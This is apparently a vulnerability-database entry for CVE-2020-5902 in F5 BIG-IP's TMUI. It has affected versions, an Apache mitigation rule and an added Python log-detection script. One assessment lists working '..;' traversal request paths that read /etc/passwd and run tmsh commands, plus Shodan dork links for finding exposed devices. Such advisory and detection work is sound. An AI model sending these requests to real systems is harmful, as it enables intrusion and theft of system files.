
CVE-2020-5902 — TMUI RCE vulnerability

Description

In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.

**Recent assessments:**

**Mad-robot** at July 05, 2020 1:21pm UTC reported:

**CVE-2020-5902**

In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.

```
/tmui/login.jsp/..;/tmui/system/user/authproperties.jsp
/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa
/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'
```

**Patch & Mitigation:-**

```
<LocationMatch ".*\.\.;.*">
Redirect 404 /
</LocationMatch>
```

**Versions Affected**

* BIG-IP 15.x: 15.1.0/15.0.0
* BIG-IP 14.x: 14.1.0 ~ 14.1.2
* BIG-IP 13.x: 13.1.0 ~ 13.1.3
* BIG-IP 12.x: 12.1.0 ~ 12.1.5
* BIG-IP 11.x: 11.6.1 ~ 11.6.5

**Dorks**

<https://beta.shodan.io/search?query=vuln%3Acve-2020-5902>
<https://www.shodan.io/search?query=http.favicon.hash%3A-335242539+%223992%22>

The same assessment text is also listed under these entries:

* **kevthehermit** at July 03, 2020 5:30pm UTC
* **ccondon-r7** at July 04, 2020 10:41pm UTC
* **busterb** at July 06, 2020 2:29am UTC
* **0xturazzi** at July 10, 2020 1:59pm UTC
* **gwillcox-r7** at October 20, 2020 5:49pm UTC
* **wvu-r7** at September 03, 2020 5:15pm UTC
* **miteshkwan1** at July 17, 2020 1:32pm UTC

Assessed Attacker Value: 5
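A log check built on the pattern the mitigation above blocks, as an added example that is not part of the original page: it percent-decodes each request path and flags any that contain `..;`. The combined access-log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Same pattern as the page's LocationMatch mitigation: "..;" anywhere in the path.
TRAVERSAL = re.compile(r"\.\.;")
# Client, request target and status from a combined-format log line (assumed format).
REQUEST = re.compile(r'^(\S+) .*?"(?:[A-Z]+) (\S+) HTTP/[\d.]+" (\d{3})')

def normalise(path, max_rounds=3):
    """Percent-decode repeatedly so %2e%2e%3b and double encoding are caught."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path

def find_tmui_traversal(lines):
    """Return (client, status, page) for requests matching the mitigation pattern."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        path = normalise(target.split("?", 1)[0])
        if TRAVERSAL.search(path):
            # The part after the last "..;" names the page the request was aimed at.
            page = path.rsplit("..;", 1)[1]
            hits.append((client, int(status), page))
    return hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [05/Jul/2020:13:21:00 +0000] "GET /tmui/login.jsp HTTP/1.1" 200 4512',
    '198.51.100.7 - - [05/Jul/2020:13:22:10 +0000] "GET /tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa HTTP/1.1" 200 31',
    '198.51.100.7 - - [05/Jul/2020:13:22:15 +0000] "GET /tmui/login.jsp/%2e%2e%3b/tmui/system/user/authproperties.jsp HTTP/1.1" 404 0',
    '203.0.113.5 - - [05/Jul/2020:13:25:00 +0000] "GET /tmui/tmui/login/welcome.jsp HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for client, status, page in find_tmui_traversal(SAMPLE_LOG):
        # 404 is what the mitigation's Redirect returns; other statuses need review.
        print(f"{client} status={status} target={page}")
```

A hit with a status other than 404 means the request was not stopped by the `LocationMatch` rule and the host should be reviewed.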

